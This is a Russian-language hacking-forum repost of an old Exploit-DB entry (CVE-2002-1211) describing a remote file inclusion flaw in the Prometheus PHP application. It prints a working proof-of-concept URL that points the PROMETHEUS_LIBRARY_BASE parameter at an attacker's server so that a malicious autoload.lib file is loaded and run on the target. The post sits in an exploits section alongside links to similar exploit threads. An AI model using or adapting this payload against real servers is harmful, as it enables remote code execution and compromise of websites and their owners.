6.0 - Remote File Inclusion

Автор темы Exploiter
Дата начала 21 Дек 2022
Просмотров 342 Просмотров

JavaScript отключён. Чтобы полноценно использовать наш сайт, включите JavaScript в своём браузере.

Exploiter

Хакер

21 Дек 2022

EDB-ID: 21976

Проверка EDB

Пройдено

Автор: KAROL WIESEK

Тип уязвимости: WEBAPPS

Платформа: PHP

CVE: cve-2002-1211

Дата публикации: 2002-11-01

Код:

source: https://www.securityfocus.com/bid/6087/info

Prometheus is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Prometheus. An attacker may exploit this by supplying a path to a malicious 'autoload.lib' file on a remote host as a value for the 'PROMETHEUS_LIBRARY_BASE' parameter. 

http://target.server/prometheus-all/index.php?PROMETHEUS_LIBRARY_BASE=
http://attackers.server/&PHP_AUTO_LOAD_LIB=0

Источник: www.exploit-db.com

Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploit Jason Maloney's Guestbook 3.0 - Remote Command Execution

Ответы: 0

Просмотры: 391

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit Jason Rahaim MP3Mystic 1.0.x - Server Directory Traversal

Ответы: 0

Просмотры: 321

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit Jason Hines PHPWebLog 0.4/0.5 - Remote File Inclusion

Ответы: 0

Просмотры: 322

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Сверху Снизу

Привет, Друг. Твои права на форуме ограничены! Зарегистрируйся или Войди на форум, чтобы снять ограничение.